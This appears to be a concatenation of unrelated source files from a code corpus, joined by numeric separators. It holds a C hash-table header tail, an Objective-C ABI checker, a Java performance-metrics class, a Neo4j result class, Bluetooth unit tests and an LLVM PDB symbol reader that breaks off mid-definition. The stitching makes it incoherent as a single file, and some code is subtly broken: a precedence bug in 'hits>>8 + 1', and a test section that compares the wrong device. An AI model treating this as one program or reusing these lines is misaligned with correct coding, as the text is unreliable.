eventually end up here
@param[in] l The left side data to be compared
@param[in] r The right side data to be compared
@return -1 if l < r, 0 if l == r, 1 if l > r
*/
typedef int (*HashCompareFunc)(void * cdata, const void * l, const void * r);
struct HashTableRec;
typedef struct HashTableRec *HashTable;
/** @brief A configuration for HtGenericHash */
typedef struct {
int keySize;
} HtGenericHashSetupRec, *HtGenericHashSetupPtr;
/** @brief ht_create initalizes a hash table for a certain hash table
configuration
@param[out] ht The hash table structure to initialize
@param[in] keySize The key size in bytes
@param[in] dataSize The data size in bytes
@param[in] hash The hash function to use for hashing keys
@param[in] compare The comparison function for hashing keys
@param[in] cdata Opaque data that will be passed to hash and
comparison functions
*/
extern _X_EXPORT HashTable ht_create(int keySize,
int dataSize,
HashFunc hash,
HashCompareFunc compare,
void *cdata);
/** @brief HtDestruct deinitializes the structure. It does not free the
memory allocated to HashTableRec
*/
extern _X_EXPORT void ht_destroy(HashTable ht);
/** @brief Adds a new key to the hash table. The key will be copied
and a pointer to the value will be returned. The data will
be initialized with zeroes.
@param[in/out] ht The hash table
@param[key] key The key. The contents of the key will be copied.
@return On error NULL is returned, otherwise a pointer to the data
associated with the newly inserted key.
@note If dataSize is 0, a pointer to the end of the key may be returned
to avoid returning NULL. Obviously the data pointed cannot be
modified, as implied by dataSize being 0.
*/
extern _X_EXPORT void *ht_add(HashTable ht, const void *key);
/** @brief Removes a key from the hash table along with its
associated data, which will be free'd.
*/
extern _X_EXPORT void ht_remove(HashTable ht, const void *key);
/** @brief Finds the associated data of a key from the hash table.
@return If the key cannot be found, the function returns NULL.
Otherwise it returns a pointer to the data associated
with the key.
@note If dataSize == 0, this function may return NULL
even if the key has been inserted! If dataSize == NULL,
use HtMember instead to determine if a key has been
inserted.
*/
extern _X_EXPORT void *ht_find(HashTable ht, const void *key);
/** @brief A generic hash function */
extern _X_EXPORT unsigned ht_generic_hash(void *cdata,
const void *ptr,
int numBits);
/** @brief A generic comparison function. It compares data byte-wise. */
extern _X_EXPORT int ht_generic_compare(void *cdata,
const void *l,
const void *r);
/** @brief A debugging function that dumps the distribution of the
hash table: for each bucket, list the number of elements
contained within. */
extern _X_EXPORT void ht_dump_distribution(HashTable ht);
/** @brief A debugging function that dumps the contents of the hash
table: for each bucket, list the elements contained
within. */
extern _X_EXPORT void ht_dump_contents(HashTable ht,
void (*print_key)(void *opaque, void *key),
void (*print_value)(void *opaque, void *value),
void* opaque);
/** @brief A hashing function to be used for hashing resource IDs when
used with HashTables. It makes no use of cdata, so that can
be NULL. It uses HashXID underneath, and should HashXID be
unable to hash the value, it switches into using the generic
hash function. */
extern _X_EXPORT unsigned ht_resourceid_hash(void *cdata,
const void * data,
int numBits);
/** @brief A comparison function to be used for comparing resource
IDs when used with HashTables. It makes no use of cdata,
so that can be NULL. */
extern _X_EXPORT int ht_resourceid_compare(void *cdata,
const void *a,
const void *b);
#endif // HASHTABLE_H
| 2,491 |
381 | #include "visibility.h"
#include "objc/runtime.h"
#include "module.h"
#include "gc_ops.h"
#include <assert.h>
#include <stdio.h>
#include <string.h>
/**
* The smallest ABI version number of loaded modules.
*/
static unsigned long min_loaded_version;
/**
* The largest ABI version number of loaded modules.
*/
static unsigned long max_loaded_version;
/**
* Structure defining the compatibility between Objective-C ABI versions.
*/
struct objc_abi_version
{
/** Version of this ABI. */
unsigned long version;
/** Lowest ABI version that this is compatible with. */
unsigned long min_compatible_version;
/** Highest ABI version compatible with this. */
unsigned long max_compatible_version;
/** Size of the module structure for this ABI version. */
unsigned long module_size;
};
enum
{
gcc_abi = 8,
gnustep_abi = 9,
gc_abi = 10
};
/**
* List of supported ABIs.
*/
static struct objc_abi_version known_abis[] =
{
/* GCC ABI. */
{gcc_abi, gcc_abi, gnustep_abi, sizeof(struct objc_module_abi_8)},
/* Non-fragile ABI. */
{gnustep_abi, gcc_abi, gc_abi, sizeof(struct objc_module_abi_8)},
/* GC ABI. Adds a field describing the GC mode. */
{gc_abi, gcc_abi, gc_abi, sizeof(struct objc_module_abi_10)}
};
static int known_abi_count =
(sizeof(known_abis) / sizeof(struct objc_abi_version));
#define FAIL_IF(x, msg) do {\
if (x)\
{\
fprintf(stderr, "Objective-C ABI Error: %s while loading %s\n", msg, module->name);\
return NO;\
}\
} while(0)
PRIVATE enum objc_gc_mode current_gc_mode = GC_Optional;
static BOOL endsWith(const char *string, const char *suffix)
{
if (NULL == string) { return NO; }
char *interior = strstr(string, suffix);
return (interior && (strlen(suffix) == strlen(interior)));
}
PRIVATE BOOL objc_check_abi_version(struct objc_module_abi_8 *module)
{
static int runtime_modules = 5;
// As a quick and ugly hack, skip these three tests for the .m files in the
// runtime. They should (in theory, at least) be aware of the GC mode and
// behave accordingly.
if (runtime_modules > 0)
{
if (endsWith(module->name, "properties.m") ||
endsWith(module->name, "associate.m") ||
endsWith(module->name, "arc.m") ||
endsWith(module->name, "blocks_runtime.m") ||
endsWith(module->name, "Protocol2.m"))
{
runtime_modules--;
return YES;
}
}
unsigned long version = module->version;
unsigned long module_size = module->size;
enum objc_gc_mode gc_mode = (version < gc_abi) ? GC_None
: ((struct objc_module_abi_10*)module)->gc_mode;
struct objc_abi_version *v = NULL;
for (int i=0 ; i<known_abi_count ; i++)
{
if (known_abis[i].version == version)
{
v = &known_abis[i];
break;
}
}
FAIL_IF(NULL == v, "Unknown ABI version");
FAIL_IF((v->module_size != module_size), "Incorrect module size");
// Only check for ABI compatibility if
if (min_loaded_version > 0)
{
FAIL_IF((v->min_compatible_version > min_loaded_version),
"Loading modules from incompatible ABIs");
FAIL_IF((v->max_compatible_version < max_loaded_version),
"Loading modules from incompatible ABIs");
if (min_loaded_version > version)
{
min_loaded_version = version;
}
if (max_loaded_version < version)
{
max_loaded_version = version;
}
}
else
{
min_loaded_version = version;
max_loaded_version = version;
}
// If we're currently in GC-optional mode, then fall to one side or the
// other if this module requires / doesn't support GC
if (current_gc_mode == GC_Optional)
{
current_gc_mode = gc_mode;
if (gc_mode == GC_Required)
{
enableGC(NO);
}
}
// We can't mix GC_None and GC_Required code, but we can mix any other
// combination
FAIL_IF((gc_mode == GC_Required) && (gc_mode != current_gc_mode),
"Attempting to mix GC and non-GC code!");
return YES;
}
| 1,446 |
357 | <gh_stars>100-1000
/*
*
* Copyright (c) 2012-2015 VMware, Inc. All Rights Reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy
* of the License at http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, without
* warranties or conditions of any kind, EITHER EXPRESS OR IMPLIED. See the
* License for the specific language governing permissions and limitations
* under the License.
*
*/
package com.vmware.identity.performanceSupport;
import org.apache.commons.lang.Validate;
/**
* Maintains performance metrics of a measurement point
*
*/
public class PerfBucketMetrics
{
private int hits;
private long totalMs;
private long ceilingMs; // the largest value, usually due to initial load
private long effectiveCeilingMs; // the second largest value
private long floorMs;
/**
* c'tor of a metric object with first data entry
* @param value date entry >=0
*/
public PerfBucketMetrics(long value)
{
Validate.isTrue(value >= 0, Long.toString(value));
hits = 1;
totalMs = value;
ceilingMs = value;
effectiveCeilingMs = 0;
floorMs = value;
}
/**
* Add measurement to the metrics. Thread safe.
*
* @param value New data entry, >=0
*/
public synchronized void addMeasurement(long value)
{
Validate.isTrue(value >= 0, Long.toString(value));
if (Long.MAX_VALUE - totalMs < value)
{
reset(); //overflow
}
++hits;
totalMs += value;
if (value > ceilingMs)
{
effectiveCeilingMs = ceilingMs;
ceilingMs = value;
}
else if (value > effectiveCeilingMs)
{
effectiveCeilingMs = value;
}
if (value < floorMs)
{
floorMs = value;
}
}
private void reset()
{ // shrink {hits, totalsMs} by 2^8 to reclaim capacity
// while still have room to exclude the ceiling value when
// calculating adjustAvg.
hits = hits>>8 + 1;
totalMs = totalMs>>8;
//compensate the ceiling value so that the adjustAvg is exactly as before:
// 1. deduct the ceilingMs portion in the shrinked data
// 2. add back the original value of ceilingMs
totalMs -= ceilingMs >> 8;
totalMs += ceilingMs;
// Leaving ceiling & floor unchanged
}
@Override
public String toString()
{
long adjustedAvg = ceilingMs; // average excluding the ceiling value due to initial load
if (hits > 1)
{
adjustedAvg = (totalMs - ceilingMs) / (hits - 1);
}
return "PerfBucketMetrics [hits=" + hits
+ ", totalMs=" + totalMs
+ ", ceilingMs=" + ceilingMs
+ ", effectiveCeilingMs=" + effectiveCeilingMs
+ ", floorMs=" + (hits==0? 0:floorMs)
+ ", adjustedAvg=" + adjustedAvg + "]";
}
}
| 1,312 |
380 | package n10s.result;
import org.neo4j.graphdb.Node;
import org.neo4j.graphdb.Relationship;
public class RelAndNodeResult {
public final Relationship rel;
public final Node node;
public RelAndNodeResult(Relationship rel, Node node) {
this.rel = rel;
this.node = node;
}
}
| 104 |
369 | // Copyright (c) 2017-2021, Mudita Sp. z.o.o. All rights reserved.
// For licensing, see https://github.com/mudita/MuditaOS/LICENSE.md
#include <catch2/catch.hpp>
#include "Device.hpp"
#include "application-settings/models/bluetooth/BluetoothSettingsModel.hpp"
TEST_CASE("Devicei comparison")
{
Devicei device1{"Dev1"};
Devicei device2{"Dev2"};
Devicei device3{"Dev1"};
bd_addr_t addr1;
bd_addr_t addr2;
std::string addr1Str{"00:12:6F:E7:9D:05"};
std::string addr2Str{"F8:5C:7D:17:E4:8F"};
sscanf_bd_addr(addr1Str.c_str(), addr1);
sscanf_bd_addr(addr2Str.c_str(), addr2);
SECTION("Same addresses and names")
{
device1.setAddress(&addr1);
device3.setAddress(&addr1);
REQUIRE(device1 == device3);
}
SECTION("Different addresses and names")
{
device1.setAddress(&addr1);
device2.setAddress(&addr2);
REQUIRE_FALSE(device1 == device3);
}
SECTION("Same names and different addresses")
{
device1.setAddress(&addr1);
device3.setAddress(&addr2);
REQUIRE_FALSE(device1 == device3);
}
}
TEST_CASE("Device handling")
{
BluetoothSettingsModel settingsModel{nullptr};
Devicei device1{"Dev1"};
Devicei device2{"Dev2"};
Devicei device3{"Dev1"};
Devicei device4{"Dev4"};
Devicei dummy{""};
bd_addr_t addr1;
bd_addr_t addr2;
bd_addr_t addr3;
std::string addr1Str{"00:12:6F:E7:9D:05"};
std::string addr2Str{"F8:5C:7D:17:E4:8F"};
std::string addr3Str{"F8:5C:7D:17:E4:00"};
sscanf_bd_addr(addr1Str.c_str(), addr1);
sscanf_bd_addr(addr2Str.c_str(), addr2);
sscanf_bd_addr(addr3Str.c_str(), addr3);
device1.setAddress(&addr1);
device2.setAddress(&addr2);
device3.setAddress(&addr1);
device4.setAddress(&addr2);
std::vector<Devicei> devicesList;
devicesList.push_back(device1);
devicesList.push_back(device2);
devicesList.push_back(device3);
SECTION("Replace devices list")
{
settingsModel.replaceDevicesList(devicesList);
REQUIRE(settingsModel.getDevices().size() == 3);
REQUIRE(settingsModel.getDevices() == devicesList);
}
SECTION("Set active device")
{
settingsModel.replaceDevicesList(devicesList);
settingsModel.setActiveDevice(device2);
REQUIRE(settingsModel.getActiveDevice().has_value());
REQUIRE(settingsModel.getActiveDevice().value().get() == device2);
}
SECTION("Set wrong active device")
{
settingsModel.replaceDevicesList(devicesList);
settingsModel.setActiveDevice(device4);
REQUIRE_FALSE(settingsModel.getActiveDevice().has_value());
}
SECTION("Set selected device")
{
settingsModel.replaceDevicesList(devicesList);
settingsModel.setSelectedDevice(device2);
REQUIRE(settingsModel.getSelectedDevice().has_value());
REQUIRE(settingsModel.getSelectedDevice().value().get() == device2);
}
SECTION("Set wrong selected device")
{
settingsModel.replaceDevicesList(devicesList);
settingsModel.setSelectedDevice(device4);
REQUIRE_FALSE(settingsModel.getSelectedDevice().has_value());
}
SECTION("Set active device state")
{
settingsModel.replaceDevicesList(devicesList);
settingsModel.setActiveDevice(device2);
settingsModel.setActiveDeviceState(DeviceState::ConnectedBoth);
REQUIRE(settingsModel.getActiveDevice().value().get().deviceState == DeviceState::ConnectedBoth);
}
SECTION("Is device connecting? - true")
{
settingsModel.replaceDevicesList(devicesList);
settingsModel.setActiveDevice(device2);
settingsModel.setActiveDeviceState(DeviceState::Connecting);
REQUIRE(settingsModel.isDeviceConnecting());
}
SECTION("Is device connecting? - false")
{
settingsModel.replaceDevicesList(devicesList);
settingsModel.setActiveDevice(device2);
settingsModel.setActiveDeviceState(DeviceState::ConnectedBoth);
REQUIRE_FALSE(settingsModel.isDeviceConnecting());
}
}
| 1,675 |
305 | <reponame>rarutyun/llvm
//===-- SymbolFileNativePDB.cpp -------------------------------------------===//
//
// Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions.
// See https://llvm.org/LICENSE.txt for license information.
// SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
//
//===----------------------------------------------------------------------===//
#include "SymbolFileNativePDB.h"
#include "clang/AST/Attr.h"
#include "clang/AST/CharUnits.h"
#include "clang/AST/Decl.h"
#include "clang/AST/DeclCXX.h"
#include "clang/AST/Type.h"
#include "Plugins/ExpressionParser/Clang/ClangUtil.h"
#include "Plugins/Language/CPlusPlus/MSVCUndecoratedNameParser.h"
#include "Plugins/TypeSystem/Clang/TypeSystemClang.h"
#include "lldb/Core/Module.h"
#include "lldb/Core/PluginManager.h"
#include "lldb/Core/StreamBuffer.h"
#include "lldb/Core/StreamFile.h"
#include "lldb/Symbol/CompileUnit.h"
#include "lldb/Symbol/LineTable.h"
#include "lldb/Symbol/ObjectFile.h"
#include "lldb/Symbol/SymbolContext.h"
#include "lldb/Symbol/SymbolVendor.h"
#include "lldb/Symbol/Variable.h"
#include "lldb/Symbol/VariableList.h"
#include "lldb/Utility/Log.h"
#include "llvm/DebugInfo/CodeView/CVRecord.h"
#include "llvm/DebugInfo/CodeView/CVTypeVisitor.h"
#include "llvm/DebugInfo/CodeView/DebugLinesSubsection.h"
#include "llvm/DebugInfo/CodeView/LazyRandomTypeCollection.h"
#include "llvm/DebugInfo/CodeView/RecordName.h"
#include "llvm/DebugInfo/CodeView/SymbolDeserializer.h"
#include "llvm/DebugInfo/CodeView/SymbolRecordHelpers.h"
#include "llvm/DebugInfo/CodeView/TypeDeserializer.h"
#include "llvm/DebugInfo/PDB/Native/DbiStream.h"
#include "llvm/DebugInfo/PDB/Native/GlobalsStream.h"
#include "llvm/DebugInfo/PDB/Native/InfoStream.h"
#include "llvm/DebugInfo/PDB/Native/ModuleDebugStream.h"
#include "llvm/DebugInfo/PDB/Native/PDBFile.h"
#include "llvm/DebugInfo/PDB/Native/SymbolStream.h"
#include "llvm/DebugInfo/PDB/Native/TpiStream.h"
#include "llvm/DebugInfo/PDB/PDBTypes.h"
#include "llvm/Demangle/MicrosoftDemangle.h"
#include "llvm/Object/COFF.h"
#include "llvm/Support/Allocator.h"
#include "llvm/Support/BinaryStreamReader.h"
#include "llvm/Support/Error.h"
#include "llvm/Support/ErrorOr.h"
#include "llvm/Support/MemoryBuffer.h"
#include "DWARFLocationExpression.h"
#include "PdbAstBuilder.h"
#include "PdbSymUid.h"
#include "PdbUtil.h"
#include "UdtRecordCompleter.h"
using namespace lldb;
using namespace lldb_private;
using namespace npdb;
using namespace llvm::codeview;
using namespace llvm::pdb;
char SymbolFileNativePDB::ID;
static lldb::LanguageType TranslateLanguage(PDB_Lang lang) {
switch (lang) {
case PDB_Lang::Cpp:
return lldb::LanguageType::eLanguageTypeC_plus_plus;
case PDB_Lang::C:
return lldb::LanguageType::eLanguageTypeC;
case PDB_Lang::Swift:
return lldb::LanguageType::eLanguageTypeSwift;
default:
return lldb::LanguageType::eLanguageTypeUnknown;
}
}
static std::unique_ptr<PDBFile> loadPDBFile(std::string PdbPath,
llvm::BumpPtrAllocator &Allocator) {
llvm::ErrorOr<std::unique_ptr<llvm::MemoryBuffer>> ErrorOrBuffer =
llvm::MemoryBuffer::getFile(PdbPath, /*FileSize=*/-1,
/*RequiresNullTerminator=*/false);
if (!ErrorOrBuffer)
return nullptr;
std::unique_ptr<llvm::MemoryBuffer> Buffer = std::move(*ErrorOrBuffer);
llvm::StringRef Path = Buffer->getBufferIdentifier();
auto Stream = std::make_unique<llvm::MemoryBufferByteStream>(
std::move(Buffer), llvm::support::little);
auto File = std::make_unique<PDBFile>(Path, std::move(Stream), Allocator);
if (auto EC = File->parseFileHeaders()) {
llvm::consumeError(std::move(EC));
return nullptr;
}
if (auto EC = File->parseStreamData()) {
llvm::consumeError(std::move(EC));
return nullptr;
}
return File;
}
static std::unique_ptr<PDBFile>
loadMatchingPDBFile(std::string exe_path, llvm::BumpPtrAllocator &allocator) {
// Try to find a matching PDB for an EXE.
using namespace llvm::object;
auto expected_binary = createBinary(exe_path);
// If the file isn't a PE/COFF executable, fail.
if (!expected_binary) {
llvm::consumeError(expected_binary.takeError());
return nullptr;
}
OwningBinary<Binary> binary = std::move(*expected_binary);
// TODO: Avoid opening the PE/COFF binary twice by reading this information
// directly from the lldb_private::ObjectFile.
auto *obj = llvm::dyn_cast<llvm::object::COFFObjectFile>(binary.getBinary());
if (!obj)
return nullptr;
const llvm::codeview::DebugInfo *pdb_info = nullptr;
// If it doesn't have a debug directory, fail.
llvm::StringRef pdb_file;
if (llvm::Error e = obj->getDebugPDBInfo(pdb_info, pdb_file)) {
consumeError(std::move(e));
return nullptr;
}
// If the file doesn't exist, perhaps the path specified at build time
// doesn't match the PDB's current location, so check the location of the
// executable.
if (!FileSystem::Instance().Exists(pdb_file)) {
const auto exe_dir = FileSpec(exe_path).CopyByRemovingLastPathComponent();
const auto pdb_name = FileSpec(pdb_file).GetFilename().GetCString();
pdb_file = exe_dir.CopyByAppendingPathComponent(pdb_name).GetCString();
}
// If the file is not a PDB or if it doesn't have a matching GUID, fail.
llvm::file_magic magic;
auto ec = llvm::identify_magic(pdb_file, magic);
if (ec || magic != llvm::file_magic::pdb)
return nullptr;
std::unique_ptr<PDBFile> pdb = loadPDBFile(std::string(pdb_file), allocator);
if (!pdb)
return nullptr;
auto expected_info = pdb->getPDBInfoStream();
if (!expected_info) {
llvm::consumeError(expected_info.takeError());
return nullptr;
}
llvm::codeview::GUID guid;
memcpy(&guid, pdb_info->PDB70.Signature, 16);
if (expected_info->getGuid() != guid)
return nullptr;
return pdb;
}
static bool IsFunctionPrologue(const CompilandIndexItem &cci,
lldb::addr_t addr) {
// FIXME: Implement this.
return false;
}
static bool IsFunctionEpilogue(const CompilandIndexItem &cci,
lldb::addr_t addr) {
// FIXME: Implement this.
return false;
}
static llvm::StringRef GetSimpleTypeName(SimpleTypeKind kind) {
switch (kind) {
case SimpleTypeKind::Boolean128:
case SimpleTypeKind::Boolean16:
case SimpleTypeKind::Boolean32:
case SimpleTypeKind::Boolean64:
case SimpleTypeKind::Boolean8:
return "bool";
case SimpleTypeKind::Byte:
case SimpleTypeKind::UnsignedCharacter:
return "unsigned char";
case SimpleTypeKind::NarrowCharacter:
return "char";
case SimpleTypeKind::SignedCharacter:
case SimpleTypeKind::SByte:
return "signed char";
case SimpleTypeKind::Character16:
return "char16_t";
case SimpleTypeKind::Character32:
return "char32_t";
case SimpleTypeKind::Complex80:
case SimpleTypeKind::Complex64:
case SimpleTypeKind::Complex32:
return "complex";
case SimpleTypeKind::Float128:
case SimpleTypeKind::Float80:
return "long double";
case SimpleTypeKind::Float64:
return "double";
case SimpleTypeKind::Float32:
return "float";
case SimpleTypeKind::Float16:
return "single";
case SimpleTypeKind::Int128:
return "__int128";
case SimpleTypeKind::Int64:
case SimpleTypeKind::Int64Quad:
return "int64_t";
case SimpleTypeKind::Int32:
return "int";
case SimpleTypeKind::Int16:
return "short";
case SimpleTypeKind::UInt128:
return "unsigned __int128";
case SimpleTypeKind::UInt64:
case SimpleTypeKind::UInt64Quad:
return "uint64_t";
case SimpleTypeKind::HResult:
return "HRESULT";
case SimpleTypeKind::UInt32:
return "unsigned";
case SimpleTypeKind::UInt16:
case SimpleTypeKind::UInt16Short:
return "unsigned short";
case SimpleTypeKind::Int32Long:
return "long";
case SimpleTypeKind::UInt32Long:
return "unsigned long";
case SimpleTypeKind::Void:
return "void";
case SimpleTypeKind::WideCharacter:
return "wchar_t";
default:
return "";
}
}
static bool IsClassRecord(TypeLeafKind kind) {
switch (kind) {
case LF_STRUCTURE:
case LF_CLASS:
case LF_INTERFACE:
return true;
default:
return false;
}
}
void SymbolFileNativePDB::Initialize() {
PluginManager::RegisterPlugin(GetPluginNameStatic(),
GetPluginDescriptionStatic(), CreateInstance,
DebuggerInitialize);
}
void SymbolFileNativePDB::Terminate() {
PluginManager::UnregisterPlugin(CreateInstance);
}
void SymbolFileNativePDB::DebuggerInitialize(Debugger &debugger) {}
ConstString SymbolFileNativePDB::GetPluginNameStatic() {
static ConstString g_name("native-pdb");
return g_name;
}
const char *SymbolFileNativePDB::GetPluginDescriptionStatic() {
return "Microsoft PDB debug symbol cross-platform file reader.";
}
SymbolFile *SymbolFileNativePDB::CreateInstance(ObjectFileSP objfile_sp) {
return new SymbolFileNativePDB(std::move(objfile_sp));
}
SymbolFileNativePDB::SymbolFileNativePDB(ObjectFileSP objfile_sp)
: SymbolFile(std::move(objfile_sp)) {}
SymbolFileNativePDB::~SymbolFileNativePDB() {}
uint32_t SymbolFileNativePDB::CalculateAbilities() {
uint32_t abilities = 0;
if (!m_objfile_sp)
return 0;
if (!m_index) {
// Lazily load and match the PDB file, but only do this once.
std::unique_ptr<PDBFile> file_up =
loadMatchingPDBFile(m_objfile_sp->GetFileSpec().GetPath(), m_allocator);
if (!file_up) {
auto module_sp = m_objfile_sp->GetModule();
if (!module_sp)
return 0;
// See if any symbol file is specified through `--symfile` option.
FileSpec symfile = module_sp->GetSymbolFileFileSpec();
if (!symfile)
return 0;
file_up = loadPDBFile(symfile.GetPath(), m_allocator);
}
if (!file_up)
return 0;
auto expected_index = PdbIndex::create(std::move(file_up));
if (!expected_index) {
llvm::consumeError(expected_index.takeError());
return 0;
}
m_index = std::move(*expected_index);
}
if (!m_index)
return 0;
// We don't especially have to be precise here. We only distinguish between
// stripped and not stripped.
abilities = kAllAbilities;
if (m_index->dbi().isStripped())
abilities &= ~(Blocks | LocalVariables);
return abilities;
}
void SymbolFileNativePDB::InitializeObject() {
m_obj_load_address = m_objfile_sp->GetBaseAddress().GetFileAddress();
m_index->SetLoadAddress(m_obj_load_address);
m_index->ParseSectionContribs();
auto ts_or_err = m_objfile_sp->GetModule()->GetTypeSystemForLanguage(
lldb::eLanguageTypeC_plus_plus);
if (auto err = ts_or_err.takeError()) {
LLDB_LOG_ERROR(lldb_private::GetLogIfAnyCategoriesSet(LIBLLDB_LOG_SYMBOLS),
std::move(err), "Failed to initialize");
} else {
ts_or_err->SetSymbolFile(this);
auto *clang = llvm::cast_or_null<TypeSystemClang>(&ts_or_err.get());
lldbassert(clang);
m_ast = std::make_unique<PdbAstBuilder>(*m_objfile_sp, *m_index, *clang);
}
}
uint32_t SymbolFileNativePDB::CalculateNumCompileUnits() {
const DbiModuleList &modules = m_index->dbi().modules();
uint32_t count = modules.getModuleCount();
if (count == 0)
return count;
// The linker can inject an additional "dummy" compilation unit into the
// PDB. Ignore this special compile unit for our purposes, if it is there.
// It is always the last one.
DbiModuleDescriptor last = modules.getModuleDescriptor(count - 1);
if (last.getModuleName() == "* Linker *")
--count;
return count;
}
Block &SymbolFileNativePDB::CreateBlock(PdbCompilandSymId block_id) {
CompilandIndexItem *cii = m_index->compilands().GetCompiland(block_id.modi);
CVSymbol sym = cii->m_debug_stream.readSymbolAtOffset(block_id.offset);
if (sym.kind() == S_GPROC32 || sym.kind() == S_LPROC32) {
// This is a function. It must be global. Creating the Function entry for
// it automatically creates a block for it.
CompUnitSP comp_unit = GetOrCreateCompileUnit(*cii);
return GetOrCreateFunction(block_id, *comp_unit)->GetBlock(false);
}
lldbassert(sym.kind() == S_BLOCK32);
// This is a block. Its parent is either a function or another block. In
// either case, its parent can be viewed as a block (e.g. a function contains
// 1 big block. So just get the parent block and add this block to it.
BlockSym block(static_cast<SymbolRecordKind>(sym.kind()));
cantFail(SymbolDeserializer::deserializeAs<BlockSym>(sym, block));
lldbassert(block.Parent != 0);
PdbCompilandSymId parent_id(block_id.modi, block.Parent);
Block &parent_block = GetOrCreateBlock(parent_id);
lldb::user_id_t opaque_block_uid = toOpaqueUid(block_id);
BlockSP child_block = std::make_shared<Block>(opaque_block_uid);
parent_block.AddChild(child_block);
m_ast->GetOrCreateBlockDecl(block_id);
m_blocks.insert({opaque_block_uid, child_block});
return *child_block;
}
lldb::FunctionSP SymbolFileNativePDB::CreateFunction(PdbCompilandSymId func_id,
CompileUnit &comp_unit) {
const CompilandIndexItem *cci =
m_index->compilands().GetCompiland(func_id.modi);
lldbassert(cci);
CVSymbol sym_record = cci->m_debug_stream.readSymbolAtOffset(func_id.offset);
lldbassert(sym_record.kind() == S_LPROC32 || sym_record.kind() == S_GPROC32);
SegmentOffsetLength sol = GetSegmentOffsetAndLength(sym_record);
auto file_vm_addr = m_index->MakeVirtualAddress(sol.so);
if (file_vm_addr == LLDB_INVALID_ADDRESS || file_vm_addr == 0)
return nullptr;
AddressRange func_range(file_vm_addr, sol.length,
comp_unit.GetModule()->GetSectionList());
if (!func_range.GetBaseAddress().IsValid())
return nullptr;
ProcSym proc(static_cast<SymbolRecordKind>(sym_record.kind()));
cantFail(SymbolDeserializer::deserializeAs<ProcSym>(sym_record, proc));
if (proc.FunctionType == TypeIndex::None())
return nullptr;
TypeSP func_type = GetOrCreateType(proc.FunctionType);
if (!func_type)
return nullptr;
PdbTypeSymId sig_id(proc.FunctionType, false);
Mangled mangled(proc.Name);
FunctionSP func_sp = std::make_shared<Function>(
&comp_unit, toOpaqueUid(func_id), toOpaqueUid(sig_id), mangled,
func_type.get(), func_range);
comp_unit.AddFunction(func_sp);
m_ast->GetOrCreateFunctionDecl(func_id);
return func_sp;
}
CompUnitSP
SymbolFileNativePDB::CreateCompileUnit(const CompilandIndexItem &cci) {
lldb::LanguageType lang =
cci.m_compile_opts ? TranslateLanguage(cci.m_compile_opts->getLanguage())
: lldb::eLanguageTypeUnknown;
LazyBool optimized = eLazyBoolNo;
if (cci.m_compile_opts && cci.m_compile_opts->hasOptimizations())
optimized = eLazyBoolYes;
llvm::SmallString<64> source_file_name =
m_index->compilands().GetMainSourceFile(cci);
FileSpec fs(source_file_name);
CompUnitSP cu_sp =
std::make_shared<CompileUnit>(m_objfile_sp->GetModule(), nullptr, fs,
toOpaqueUid(cci.m_id), lang, optimized);
SetCompileUnitAtIndex(cci.m_id.modi, cu_sp);
return cu_sp;
}
lldb::TypeSP SymbolFileNativePDB::CreateModifierType(PdbTypeSymId type_id,
const ModifierRecord &mr,
CompilerType ct) {
TpiStream &stream = m_index->tpi();
std::string name;
if (mr.ModifiedType.isSimple())
name = std::string(GetSimpleTypeName(mr.ModifiedType.getSimpleKind()));
else
name = computeTypeName(stream.typeCollection(), mr.ModifiedType);
Declaration decl;
lldb::TypeSP modified_type = GetOrCreateType(mr.ModifiedType);
return std::make_shared<Type>(toOpaqueUid(type_id), this, ConstString(name),
modified_type->GetByteSize(nullptr), nullptr,
LLDB_INVALID_UID, Type::eEncodingIsUID, decl,
ct, Type::ResolveState::Full);
}
lldb::TypeSP
SymbolFileNativePDB::CreatePointerType(PdbTypeSymId type_id,
const llvm::codeview::PointerRecord &pr,
CompilerType ct) {
TypeSP pointee = GetOrCreateType(pr.ReferentType);
if (!pointee)
return nullptr;
if (pr.isPointerToMember()) {
MemberPointerInfo mpi = pr.getMemberInfo();
GetOrCreateType(mpi.ContainingType);
}
Declaration decl;
return std::make_shared<Type>(toOpaqueUid(type_id), this, ConstString(),
pr.getSize(), nullptr, LLDB_INVALID_UID,
Type::eEncodingIsUID, decl, ct,
Type::ResolveState::Full);
}
lldb::TypeSP SymbolFileNativePDB::CreateSimpleType(TypeIndex ti,
CompilerType ct) {
uint64_t uid = toOpaqueUid(PdbTypeSymId(ti, false));
if (ti == TypeIndex::NullptrT()) {
Declaration decl;
return std::make_shared<Type>(
uid, this, ConstString("std::nullptr_t"), 0, nullptr, LLDB_INVALID_UID,
Type::eEncodingIsUID, decl, ct, Type::ResolveState::Full);
}
if (ti.getSimpleMode() != SimpleTypeMode::Direct) {
TypeSP direct_sp = GetOrCreateType(ti.makeDirect());
uint32_t pointer_size = 0;
switch (ti.getSimpleMode()) {
case SimpleTypeMode::FarPointer32:
case SimpleTypeMode::NearPointer32:
pointer_size = 4;
break;
case SimpleTypeMode::NearPointer64:
pointer_size = 8;
break;
default:
// 128-bit and 16-bit pointers unsupported.
return nullptr;
}
Declaration decl;
return std::make_shared<Type>(
uid, this, ConstString(), pointer_size, nullptr, LLDB_INVALID_UID,
Type::eEncodingIsUID, decl, ct, Type::ResolveState::Full);
}
if (ti.getSimpleKind() == SimpleTypeKind::NotTranslated)
return nullptr;
size_t size = GetTypeSizeForSimpleKind(ti.getSimpleKind());
llvm::StringRef type_name = GetSimpleTypeName(ti.getSimpleKind());
Declaration decl;
return std::make_shared<Type>(uid, this, ConstString(type_name), size,
nullptr, LLDB_INVALID_UID, Type::eEncodingIsUID,
decl, ct, Type::ResolveState::Full);
}
static std::string GetUnqualifiedTypeName(const TagRecord &record) {
if (!record.hasUniqueName()) {
MSVCUndecoratedNameParser parser(record.Name);
llvm::ArrayRef<MSVCUndecoratedNameSpecifier> specs = parser.GetSpecifiers();
return std::string(specs.back().GetBaseName());
}
llvm::ms_demangle::Demangler demangler;
StringView sv(record.UniqueName.begin(), record.UniqueName.size());
llvm::ms_demangle::TagTypeNode *ttn = demangler.parseTagUniqueName(sv);
if (demangler.Error)
return std::string(record.Name);
llvm::ms_demangle::IdentifierNode *idn =
ttn->QualifiedName->getUnqualifiedIdentifier();
return idn->toString();
}
lldb::TypeSP
